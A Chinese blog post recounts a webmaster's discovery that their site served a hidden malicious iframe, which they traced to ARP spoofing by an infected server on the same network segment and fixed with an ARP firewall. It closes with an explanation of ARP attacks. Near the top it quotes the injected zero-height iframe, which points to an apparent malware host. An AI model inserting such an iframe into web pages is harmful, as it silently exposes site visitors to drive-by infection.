今天凌晨一打開自己的網(wǎng)站，卡巴就彈出來說有病毒，報(bào)告為“惡意程序 Exploit.Win32.IMG-ANI.k 文件: F:\Documents and Settings\*****\Local Settings\Temporary Internet Files\Content.IE5\DF7VHPOE\love[1].jpg”，然后網(wǎng)頁顯示的也有問題，最上方居然裸露出來了一小段源碼，于是馬上查看源碼，發(fā)現(xiàn)代碼居然被改了.

最上面變成了：

〈IFRAME height=0 src="httP://web.21575.com/113/" width=150〉〈/IFRAME〉

我的第一反應(yīng)就是網(wǎng)站被人掛馬了，首先想到的是不是程序有漏洞，被人傳了木馬，趕緊用FTP連上，檢查ASP文件，發(fā)現(xiàn)所有的ASP文件都沒有是今天修改過的，模板系統(tǒng)也沒有問題，這下我真的不知道怎么辦了。都搞不清楚問題出在哪里。。。
然后我對(duì)掛馬的這個(gè)網(wǎng)站來了興趣，在百度里一搜“21575”，

發(fā)現(xiàn)有一條的結(jié)果的標(biāo)題是“服務(wù)器被ARP欺騙，大家請(qǐng)不要訪問我的站”，看了一下那條帖子，然后又聯(lián)想到昨天下午收到了IDC的短信，提醒說最近ARP病毒泛濫，于是我馬上就想到應(yīng)該是受到ARP攻擊了。
下午我還去IDC的網(wǎng)站上看了一下，有一篇關(guān)于防范ARP攻擊的公告，還提供了ARP防范工具下載，趕緊下了，然后安裝.
　這個(gè)軟件是ARP防火墻（Anti ARP Sniffer），下載地址：http://www.antiarp.com/newsopen2.asp?ArticleID=24

官網(wǎng)：http://www.antiarp.com

剛裝上以后ARP防火墻啟動(dòng)不了，于是重啟服務(wù)器，順利啟動(dòng)了，然后就看到ARP防火墻提示受到ARP攻擊了，還能跟蹤到攻擊的來源IP
裝上ARP防火墻以后，再訪問網(wǎng)站，一切正常.

ARP攻擊的先進(jìn)性就好比DNS劫持一樣，處于最上層。網(wǎng)頁實(shí)際的文件并沒有改變，但是發(fā)送給瀏覽器以后就變了樣了，被病毒給改了.

相關(guān)知識(shí)：

ARP即Address Resolution Protocol，將網(wǎng)絡(luò)IP地址映射至網(wǎng)卡硬件MAC地址的協(xié)議。一般危害為欺騙同網(wǎng)段內(nèi)的其他服務(wù)器地址，截獲其數(shù)據(jù)報(bào)文、監(jiān)聽數(shù)據(jù)傳輸、盜取帳號(hào)信息，甚至對(duì)來訪數(shù)據(jù)包進(jìn)行欺騙和偽造。

該病毒發(fā)作方式為：網(wǎng)段內(nèi)一臺(tái)服務(wù)器中此病毒，病毒將以此機(jī)器作為肉雞，對(duì)同網(wǎng)段服務(wù)器進(jìn)行數(shù)據(jù)劫持和欺騙。類似于奪取同段內(nèi)的其他服務(wù)器的IP，導(dǎo)致合法服務(wù)器無法正常通訊。此病毒還可對(duì)網(wǎng)關(guān)地址進(jìn)行欺騙，造成此網(wǎng)段所有IP地址都無法正常解析。以致網(wǎng)絡(luò)大面積癱瘓。

我這次的情形就是上面說的“對(duì)來訪數(shù)據(jù)包進(jìn)行欺騙和偽造”、“對(duì)同網(wǎng)段服務(wù)器進(jìn)行數(shù)據(jù)劫持和欺騙”，ARP防火墻查到了攻擊源，是同網(wǎng)段內(nèi)的一臺(tái)機(jī)子，我看了一下那臺(tái)機(jī)子，居然是用IIS的默認(rèn)站點(diǎn)建的站（可以直接用IP訪問），估計(jì)系統(tǒng)漏洞不少，被人攻擊中毒了，然后連累到我們同網(wǎng)段內(nèi)的其他無辜的用戶。

安全很重要！尤其是在最近病毒木馬泛濫的日子里。

【編輯推薦】

1. 代理ARP 技術(shù)(頁1)
2. 專題：ARP攻擊防范與解決方案